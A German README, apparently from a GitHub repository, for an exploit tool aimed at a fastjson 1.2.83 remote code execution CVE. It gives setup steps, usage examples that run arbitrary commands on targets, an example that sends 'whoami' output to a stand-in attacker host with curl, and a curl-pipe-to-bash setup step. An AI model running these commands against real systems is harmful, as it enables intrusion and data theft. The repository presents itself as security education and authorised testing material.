
CVE-2026-16723 — Updated!
CVE-2026-16723
CVE-2026-16723
Spenden
Unterstützen Sie die Wartung dieses Projekts mit PayPal oder durch Scannen des QR-Codes unten.
⚡ Einfache Nutzung
Verwenden Sie dieses Projekt nur in sicheren und autorisierten Umgebungen wie:
- Lokale virtuelle Maschinen
- Docker-Container
- Isolierte Laborumgebungen
- Autorisierte Penetrationstest-Umgebungen
Beispiel-Setup:
git clone https://github.com/HORKimhab/CVE-2026-16723
cd CVE-2026-16723
# Download fastjson JAR (optional - script will auto-download)
wget https://repo1.maven.org/maven2/com/alibaba/fastjson/1.2.83/fastjson-1.2.83.jar
# Project use python follow below
# Create a virtual environment
python -m venv venv
# Activate the virtual environment
# macOS / Linux
source venv/bin/activate
# Windows (Git Bash / WSL)
source venv/Scripts/activate
# Install requirments
pip install -r requirements.txt
Beispielverwendung:
# Basic exploit
python CVE-2026-16723.py -t http://localhost:8080/parse
# Custom command
python CVE-2026-16723.py -t http://localhost:8080/parse -c "id > /tmp/result"
# With custom IP and port
python CVE-2026-16723.py -t http://localhost:8080/parse -c "whoami" --remote-ip 192.168.1.100 --port 9000
# HTTPS target
python CVE-2026-16723.py -t https://target.com/api/parse -c "curl http://attacker.com/$(whoami)" --insecure
# Using proxy
python CVE-2026-16723.py -t http://localhost:8080/parse --proxy http://127.0.0.1:8080
# Custom FD range
python CVE-2026-16723.py -t http://localhost:8080/parse --fd-range 10-50
# Quiet mode
python CVE-2026-16723.py -t http://localhost:8080/parse --quiet
Hinweis:
- Wenn Sie von einem anderen Projekt klonen, müssen Sie
curl -fsSL https://gist.githubusercontent.com/HORKimhab/24c89ee9a86a42aac88381334f8bfe48/raw | bash -s -- -yausführen, um das verschachtelte Verzeichnis .git zu bereinigen. - z. B.: cve-2025-46822.sh, cve-2025-46822-lab.sh, ...
Quellen und Referenzen
- https://fearsoff.org/research/fastjson-1-2-83-rce
- https://thehackernews.com/2026/07/fastjson-1x-rce-vulnerability-targeted.html
- https://aiweekly.co/alerts/alibabas-fastjson-1x-hit-by-active-rce-exploits-no-patch
📚 Repository für Cybersicherheitsbildung und -forschung
Ein Repository zum Lernen, Testen und Erforschen von Cybersicherheitskonzepten in kontrollierten Umgebungen.
⚠️ Sicherheits- & Rechtshinweis
Zweck
Dieses Repository dient ausschließlich zu Bildungs- und autorisierten Sicherheitsforschungszwecken.
Es soll Nutzern helfen, Folgendes zu lernen:
- Sicherheitslücken
- Sandbox- und Isolationskonzepte
- Sichere Codierung und defensive Praktiken
Nur zur autorisierten Nutzung
Verwenden Sie dieses Repository nur in Umgebungen, in denen Sie die Berechtigung haben, wie:
- Persönliche Labore oder virtuelle Maschinen
- Docker- oder isolierte Umgebungen
- Autorisierte Penetrationstests
- Cybersicherheitsschulungen oder akademische Forschung
Unbefugte oder illegale Nutzung ist strengstens untersagt.
Keine Haftung
Der Autor und die Mitwirkenden sind nicht verantwortlich für Schäden, Missbrauch, rechtliche Probleme oder Verluste, die durch dieses Projekt verursacht werden.
Durch die Nutzung dieses Repositorys stimmen Sie Folgendem zu:
- Sie sind für Ihre eigenen Handlungen verantwortlich
- Sie werden es legal und ethisch verwenden
- Das Projekt wird ohne Gewährleistung bereitgestellt
Ethische Nutzung
Dieses Projekt ist vorgesehen für:
- Defensive Sicherheitsforschung
- Cybersicherheitsbildung
- Sensibilisierung für Sicherheitslücken
- Forschung zu sicheren Systemen und Software
Bitte befolgen Sie verantwortungsvolle Offenlegungspraktiken (Responsible Disclosure) und halten Sie sich an alle geltenden Gesetze.
Kontakt
Für verantwortungsvolle Offenlegung oder Zusammenarbeit kontaktieren Sie den Repository-Betreuer über GitHub.
